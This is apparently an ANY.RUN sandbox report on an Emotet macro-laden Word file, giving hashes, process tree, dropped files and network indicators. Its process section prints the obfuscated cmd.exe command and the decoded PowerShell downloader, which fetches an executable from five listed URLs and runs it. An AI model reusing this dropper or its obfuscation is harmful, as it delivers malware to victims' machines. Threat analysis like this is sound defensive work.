analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

15_Januar_2019.doc

Full analysis: https://app.any.run/tasks/ee3ed728-b9b9-4fdd-b1e9-b0eaaab1c86c
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: January 18, 2019, 09:46:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 15 18:14:00 2019, Last Saved Time/Date: Tue Jan 15 18:14:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0
MD5:

A7D9C91DD296745CC5FDD6987B9FAA8D

SHA1:

595501FD3CAE9601015DC24BD51A3786D64FF58F

SHA256:

98081B4049E02B007390F7F3D833D1BA526812F966828D0972DFB8E1FAEEAF6C

SSDEEP:

3072:VN8GhDS0o9zTGOZD6EbzCdn+0Bkbj1Q3:VHoUOZDlben+0Kbp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2932)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2932)

    • Runs app for hidden code execution

      • cmd.exe (PID: 3076)

    • Executes PowerShell scripts

      • cmd.exe (PID: 3392)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2476)
      • cmd.exe (PID: 3076)

    • Creates files in the user directory

      • powershell.exe (PID: 3900)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2932)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2932)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:01:15 18:14:00
ModifyDate: 2019:01:15 18:14:00
Pages: 1
Words: -
Characters: 3
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 3
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2932"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\15_Januar_2019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2476"C:\Windows\system32\cmd.exe" /c %PRoGRAMDATa:~0,1%%PRogRAMData:~9,2% /V:oN /R"SeT pSMR=pow^%PUBLIZ:~5,1^%A^%SESSIONN]2RE:~-#,1^%h^%[ERP:~-3,1^%ll $[XA?tytk)9Zheck`ng]2ccountdp9;$EAgonom`cxzooden[owel?jA)new-object Net.xzebZl`ent;$4ubbeAhb)9http://www.foAmXA-31.Au/x]w0Q_XAJ]eUD`_0@http://cod`enlXAnhnme.vn/wmfuxxu_bf8c_ccJhR@http://www.v`XAje?delbo?que.com/oJmIZL4_SF1qj[c]v@http://www.k`beA-?oft.Au/Heq3ZDGN_tvvO3]2e1q@http://www.yogXA?pXAceme.com/QZPd`[_LN2`P6fHd9.Spl`t(9@97;$Intell`gentZottonZh`p?vv)9SleekZottonSh`Atdj9;$ZomputeA?Book?dl ) 91859;$hXApt`cml)9BeAk?h`Aejc9;$deployww)$env:publ`c+9\9+$ZomputeA?Book?dl+9.exe9;foAeXAch($XAAAXAyXAw `n $4ubbeAhb7QGtAyQG$EAgonom`cxzooden[owel?jA.DownloXAdF`le($XAAAXAyXAw, $deployww7;$depo?`tvm)9RetXAljk9;If ((Get-Item $deployww7.length -ge 800007 QGInvoke-Item $deployww;$[exXA?tw)9Fullyconf`guAXAblenA9;bAeXAk;}}cXAtchQG}}$l`mekA)9ZomputeA?wj9;& SEt 8nN=!pSMR:9='!& sEt ZDpU=!8nN:QG={!& seT qLFn=!ZDpU:R=M!& sET xL=!qLFn:A=r!& seT t0Q=!xL:]=9!& Set 5u=!t0Q:92=A!&& sET CB=!5u:Xr=a!& set QgX=!CB:xz=W!&& seT XNV=!QgX:`=i!& SET 1RDn=!XNV:Z=C!&& SeT jDH=!1RDn:?=s!&& SeT CL=!jDH:4=R!& SET Dh=!CL:)==!& sEt dB=!Dh:[=T!& set X3F=!dB:#=4!& Set Kq=!X3F:7=)!&eCHO %Kq%| cmD.exe "C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3076CmD /V:oN /R"SeT pSMR=pow^%PUBLIZ:~5,1^%A^%SESSIONN]2RE:~-#,1^%h^%[ERP:~-3,1^%ll $[XA?tytk)9Zheck`ng]2ccountdp9;$EAgonom`cxzooden[owel?jA)new-object Net.xzebZl`ent;$4ubbeAhb)9http://www.foAmXA-31.Au/x]w0Q_XAJ]eUD`_0@http://cod`enlXAnhnme.vn/wmfuxxu_bf8c_ccJhR@http://www.v`XAje?delbo?que.com/oJmIZL4_SF1qj[c]v@http://www.k`beA-?oft.Au/Heq3ZDGN_tvvO3]2e1q@http://www.yogXA?pXAceme.com/QZPd`[_LN2`P6fHd9.Spl`t(9@97;$Intell`gentZottonZh`p?vv)9SleekZottonSh`Atdj9;$ZomputeA?Book?dl ) 91859;$hXApt`cml)9BeAk?h`Aejc9;$deployww)$env:publ`c+9\9+$ZomputeA?Book?dl+9.exe9;foAeXAch($XAAAXAyXAw `n $4ubbeAhb7QGtAyQG$EAgonom`cxzooden[owel?jA.DownloXAdF`le($XAAAXAyXAw, $deployww7;$depo?`tvm)9RetXAljk9;If ((Get-Item $deployww7.length -ge 800007 QGInvoke-Item $deployww;$[exXA?tw)9Fullyconf`guAXAblenA9;bAeXAk;}}cXAtchQG}}$l`mekA)9ZomputeA?wj9;& SEt 8nN=!pSMR:9='!& sEt ZDpU=!8nN:QG={!& seT qLFn=!ZDpU:R=M!& sET xL=!qLFn:A=r!& seT t0Q=!xL:]=9!& Set 5u=!t0Q:92=A!&& sET CB=!5u:Xr=a!& set QgX=!CB:xz=W!&& seT XNV=!QgX:`=i!& SET 1RDn=!XNV:Z=C!&& SeT jDH=!1RDn:?=s!&& SeT CL=!jDH:4=R!& SET Dh=!CL:)==!& sEt dB=!Dh:[=T!& set X3F=!dB:#=4!& Set Kq=!X3F:7=)!&eCHO %Kq%| cmD.exe "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3288C:\Windows\system32\cmd.exe /S /D /c" eCHO %Kq%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3392cmD.exe C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3900powershell $Tastytk='CheckingAccountdp';$ErgonomicWoodenTowelsjr=new-object Net.WebClient;$Rubberhb='http://www.forma-31.ru/x9w0Q_aJ9eUDi_0@http://codienlanhnme.vn/wmfuxxu_bf8c_ccJhM@http://www.viajesdelbosque.com/oJmICLR_SF1qjTc9v@http://www.kiber-soft.ru/Heq3CDGN_tvvO3Ae1q@http://www.yogaspaceme.com/QCPdiT_LN2iP6fHd'.Split('@');$IntelligentCottonChipsvv='SleekCottonShirtdj';$ComputersBooksdl = '185';$hapticml='Berkshirejc';$deployww=$env:public+'\'+$ComputersBooksdl+'.exe';foreach($arrayaw in $Rubberhb){try{$ErgonomicWoodenTowelsjr.DownloadFile($arrayaw, $deployww);$depositvm='Metaljk';If ((Get-Item $deployww).length -ge 80000) {Invoke-Item $deployww;$Texastw='Fullyconfigurablenr';break;}}catch{}}$limekr='Computerswj';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 421
Read events
957
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
2932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR87B4.tmp.cvr
MD5:
SHA256:
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FDAAC77D.wmf
MD5:
SHA256:
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B3E00393.wmf
MD5:
SHA256:
3900powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DESUJ70AHUBEKLJOOG21.temp
MD5:
SHA256:
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7D7E226C.wmfwmf
MD5:B8995D5F60D0DD28071E47BD2C2D288F
SHA256:AD8E5B2372EA91B8AC17B8083FAADAF7C07CFDC256F1E431EB9AF7EDC0DFB155
2932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:70B14D807AC82B9DF21F18C147184D05
SHA256:467EFFBC023347E7659FBAE0D736FB6AC5233686D4FFE34258BAE276F4C55967
2932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\685CEF5A.wmfwmf
MD5:5D4B1E7B85591BB4EC13AB590A7DF84E
SHA256:978AFC8A44609673E41EA6FA6C2BC6251A8E45D6573F6BA26DB77F967554EB89
2932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$_Januar_2019.docpgc
MD5:17EF68127D2447EFD8BD64D1F10E1D1D
SHA256:170198C9B6AD7C4A89EA9CB6A287EA765D4BFDB0F0FA792DE464240DBAE2774F
3900powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19964b.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3900powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3900
powershell.exe
GET
404
103.18.6.24:80
http://codienlanhnme.vn/wmfuxxu_bf8c_ccJhM
VN
xml
345 b
suspicious
3900
powershell.exe
GET
404
77.222.63.27:80
http://www.forma-31.ru/x9w0Q_aJ9eUDi_0
RU
xml
345 b
suspicious
3900
powershell.exe
GET
404
159.89.138.46:80
http://www.viajesdelbosque.com/oJmICLR_SF1qjTc9v
US
xml
345 b
unknown
3900
powershell.exe
GET
404
84.54.204.244:80
http://www.kiber-soft.ru/Heq3CDGN_tvvO3Ae1q
RU
xml
345 b
suspicious
3900
powershell.exe
GET
404
162.215.249.12:80
http://www.yogaspaceme.com/QCPdiT_LN2iP6fHd
US
xml
345 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3900
powershell.exe
77.222.63.27:80
www.forma-31.ru
SpaceWeb Ltd
RU
suspicious
3900
powershell.exe
84.54.204.244:80
www.kiber-soft.ru
PJSC Rostelecom
RU
suspicious
3900
powershell.exe
159.89.138.46:80
www.viajesdelbosque.com
US
unknown
3900
powershell.exe
103.18.6.24:80
codienlanhnme.vn
GMO RUNSYSTEM JSC
VN
suspicious
3900
powershell.exe
162.215.249.12:80
www.yogaspaceme.com
Unified Layer
US
suspicious

DNS requests

Domain
IP
Reputation
www.forma-31.ru
  • 77.222.63.27
suspicious
codienlanhnme.vn
  • 103.18.6.24
suspicious
www.viajesdelbosque.com
  • 159.89.138.46
unknown
www.kiber-soft.ru
  • 84.54.204.244
suspicious
www.yogaspaceme.com
  • 162.215.249.12
suspicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
15_Januar_2019.doc